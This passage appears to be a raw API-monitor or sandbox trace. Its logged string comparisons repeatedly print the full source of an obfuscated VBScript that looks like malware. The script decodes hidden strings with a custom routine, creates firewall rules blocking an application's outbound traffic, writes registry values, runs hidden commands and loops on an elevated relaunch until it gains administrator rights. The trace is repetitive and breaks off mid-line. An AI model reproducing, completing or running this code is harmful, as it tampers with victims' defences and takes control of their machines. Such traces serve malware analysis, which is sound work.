bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0222.925] wcsncmp (_String1="E7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.925] wcsncmp (_String1="7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 42 [0222.926] wcsncmp (_String1="\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.926] wcsncmp (_String1="\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 